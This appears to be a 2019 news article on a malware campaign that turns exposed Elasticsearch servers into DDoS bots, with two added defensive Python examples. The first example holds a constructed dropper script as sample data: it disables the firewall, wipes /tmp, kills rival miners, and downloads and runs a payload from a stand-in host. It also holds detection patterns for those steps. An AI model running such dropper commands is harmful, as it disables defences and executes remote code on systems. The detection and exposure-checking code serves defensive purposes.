Posted on July 25, 2019 at 12:13 PM
The new malware attack has two phases, one of which deletes any existing crypto-mining malware. This is not the first time Elasticsearch databases have shown how vulnerable they can be.
Trend Micro's IT security researchers have discovered a new malware campaign targeting Elasticsearch databases. These databases store, retrieve, and manage document-oriented and semi-structured data, relying on flexible data models to build and update visitor profiles for the low-latency, demanding workloads that real-time engagement requires. More than 2000 companies are currently reported to use Elasticsearch, including the well-known firm Uber.
The campaign takes advantage of publicly exposed or unprotected Elasticsearch databases and infects them with malware, which in turn turns them into botnet zombies that carry out DDoS attacks.
One instance of the outbreak exploited CVE-2015-1427, an older vulnerability in the Elasticsearch Groovy scripting engine. Another was able to exploit CVE-2017-5638, a remote code execution (RCE) vulnerability in Apache Struts 2.
Researchers found that the malware used is the Setag backdoor, first discovered in 2017. Setag can steal system data and launch various kinds of DDoS attacks.
Further investigation of the binaries revealed a backdoor variant with capabilities similar to those of the BillGates malware. BillGates came to light in 2014 and shares Setag's features, including compromising the targeted machine and then launching DDoS attacks.
The malware attacks in two phases. In the first phase, it runs a script (s67.sh) that disables the firewall and specifies which shell to use. In the second phase, it runs the s66.sh script, which deletes specific files, including a range of configuration files in the /tmp directory, as well as any cryptominers installed by other malware.
This removes traces of the initial infection and downloads the cybercriminals' chosen binary, all so the malware can run its own operation. The researchers noted that the attackers use expendable domains so they can swap URLs as soon as one is detected.
It is worth mentioning that these criminals are using compromised websites to drop their payload. Researchers are concerned that continuing to abuse compromised websites, rather than sites the attackers build themselves, will also help them evade detection. Such a capability in any malware is a huge "red flag."
These cybercriminals used URL encoding when the scripts are retrieved, and they compromise legitimate websites. This could mean they are still testing their hacking tools. It is also possible that they are readying their infrastructure before escalating to a cyberwar.
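The two-phase behaviour described above (firewall disabled, /tmp cleanup, rival cryptominers killed, a payload fetched from a percent-encoded URL and executed from /tmp) is exactly the kind of pattern a defender can look for in a dropped script or in recorded shell history. The following is an added detection example, not code from the article or from Trend Micro's report; the script it scans is a constructed sample written in the style of such a dropper, and the indicator patterns, miner process names and the hypothetical host example.invalid are assumptions, not indicators taken from the real s66.sh or s67.sh.

```python
import re
from urllib.parse import unquote

# Constructed sample resembling a staged shell dropper (NOT the real s66.sh/s67.sh).
SAMPLE_SCRIPT = """#!/bin/sh
SHELL=/bin/bash
iptables -F
service iptables stop
rm -rf /tmp/*.conf
pkill -f xmrig
killall minerd
wget -q http://example.invalid/%73%74%61%67%65 -O /tmp/.x
chmod +x /tmp/.x
/tmp/.x
"""

# Indicator table: one regex per behaviour the article attributes to the two phases.
# Process names and commands are assumed examples, not a complete signature set.
INDICATORS = {
    "firewall_disabled": re.compile(
        r"\b(iptables\s+-F|ufw\s+disable|service\s+iptables\s+stop|"
        r"systemctl\s+(stop|disable)\s+firewalld)"),
    "tmp_cleanup": re.compile(r"\brm\s+-rf?\s+/tmp/"),
    "miner_kill": re.compile(
        r"\b(pkill|killall)\b.*\b(xmrig|minerd|kworkerds|cryptonight)\b", re.I),
    "payload_download": re.compile(r"\b(wget|curl)\b.*https?://\S+"),
    "exec_from_tmp": re.compile(r"^\s*(sh\s+|bash\s+)?/tmp/\S+"),
}

URL_RE = re.compile(r"https?://\S+")


def decoded_urls(line):
    """Return every URL in the line with percent-encoding removed, so an
    obfuscated path reads the way the defender would see it on the wire."""
    return [unquote(u) for u in URL_RE.findall(line)]


def scan_script(text):
    """Classify each line of a shell script against the indicator table.
    Returns a dict mapping category -> list of (line_no, stripped_line) hits."""
    hits = {name: [] for name in INDICATORS}
    for no, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits[name].append((no, line.strip()))
    return hits


def assess(hits):
    """Turn raw hits into a verdict. Firewall tampering plus a download and
    execution from /tmp together form the two-phase pattern from the article;
    the score is simply the number of distinct indicator categories present."""
    present = {name for name, lines in hits.items() if lines}
    two_phase = {"firewall_disabled", "payload_download", "exec_from_tmp"} <= present
    return {"categories": sorted(present), "score": len(present),
            "two_phase_dropper": two_phase}


if __name__ == "__main__":
    found = scan_script(SAMPLE_SCRIPT)
    for category, lines in found.items():
        for no, line in lines:
            print(f"{category:18s} line {no}: {line}")
            for url in decoded_urls(line):
                print(f"{'':18s}   decoded URL: {url}")
    print(assess(found))
```

Run against a captured script or a user's shell history; a hit in three or more categories, or the `two_phase_dropper` flag, is worth an analyst's attention even though any single indicator (an admin flushing iptables, say) is benign on its own.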
Elasticsearch's Poor History
Elasticsearch servers have a poor history with malware. In September 2017, security researcher Bob Diachenko discovered over 4,000 Elasticsearch servers hosting PoS malware. In total, Diachenko also identified more than 15,000 Elasticsearch servers with no password or authentication protection.
Then, in November 2018, HackenProof found an IP with a publicly available Elasticsearch cluster that left the personal data of about 57 million US citizens unprotected. Two months after this, Security Discovery found an unprotected Elasticsearch server holding 24 million records of personal data.
More recently, in April 2019, it was reported that thousands of exposed Kibana instances made Elasticsearch databases and servers publicly accessible.
How to Defend Against the Attack
Any firm that uses Elasticsearch should be mindful of this new attack. Elasticsearch has already issued a patch for this vulnerability; apply it to avoid becoming a victim.
Security specialists can help defend against attack campaigns that seek to deliver a DDoS botnet by adopting a comprehensive vulnerability management program that prioritizes software patches according to the risk posed by known security weaknesses. Businesses should also protect against DDoS attacks using anomaly detection, next-generation firewalls, and other applicable tools.
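The defensive advice above comes down to two checks an operator can automate: is the node reachable without credentials (the condition behind the exposed-server incidents listed earlier), and is it running a version older than the one the vendor's patch requires. The following is an added example, not code from the article or from Elastic; the host es.example.invalid and the JSON responses are constructed, the `fetch` callable is injected so the check runs offline, and the minimum patched version is a placeholder the operator must fill in from the vendor advisory, since the article does not state it.

```python
import json
import urllib.error
import urllib.request

# Placeholder: replace with the fixed version from the vendor advisory for the CVE in question.
MIN_PATCHED_VERSION = "0.0.0"


def http_get(url, timeout=5):
    """Unauthenticated GET for live use; returns (status, body)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def version_tuple(version):
    """'1.4.2-beta1' -> (1, 4, 2); comparable with another tuple of the same shape."""
    core = version.split("-")[0]
    return tuple(int(part) for part in core.split("."))


def assess_node(base_url, fetch=http_get, min_patched_version=MIN_PATCHED_VERSION):
    """Return a list of findings for one Elasticsearch HTTP endpoint.
    An empty list means the node required credentials and reported nothing old."""
    findings = []
    base = base_url.rstrip("/")

    status, body = fetch(base + "/")
    if status == 200:
        findings.append("cluster root readable without authentication")
        try:
            version = json.loads(body).get("version", {}).get("number")
        except ValueError:
            version = None
        if version and version_tuple(version) < version_tuple(min_patched_version):
            findings.append(f"version {version} is older than required {min_patched_version}")

    # _cat/indices listing is a second, independent sign of an open cluster.
    status, _ = fetch(base + "/_cat/indices")
    if status == 200:
        findings.append("index list readable without authentication")
    return findings


# Constructed responses standing in for two nodes: one open and old, one locked down.
OPEN_NODE = "http://es.example.invalid:9200"
LOCKED_NODE = "http://es-secure.example.invalid:9200"
FAKE_RESPONSES = {
    OPEN_NODE + "/": (200, json.dumps({"name": "node-1", "version": {"number": "1.4.2"}})),
    OPEN_NODE + "/_cat/indices": (200, "green open logs 5 1 100 0 1mb 1mb\n"),
    LOCKED_NODE + "/": (401, '{"error":"missing authentication credentials"}'),
    LOCKED_NODE + "/_cat/indices": (401, '{"error":"missing authentication credentials"}'),
}


def fake_fetch(url):
    """Offline stand-in for http_get over the constructed responses."""
    return FAKE_RESPONSES.get(url, (404, ""))


if __name__ == "__main__":
    for node in (OPEN_NODE, LOCKED_NODE):
        print(node, "->", assess_node(node, fetch=fake_fetch, min_patched_version="9.9.9") or "no findings")
```

For a real inventory, call `assess_node` with the default `http_get` and the advisory's fixed version; anything that comes back with a finding should be behind authentication and a restricted network path, not only patched.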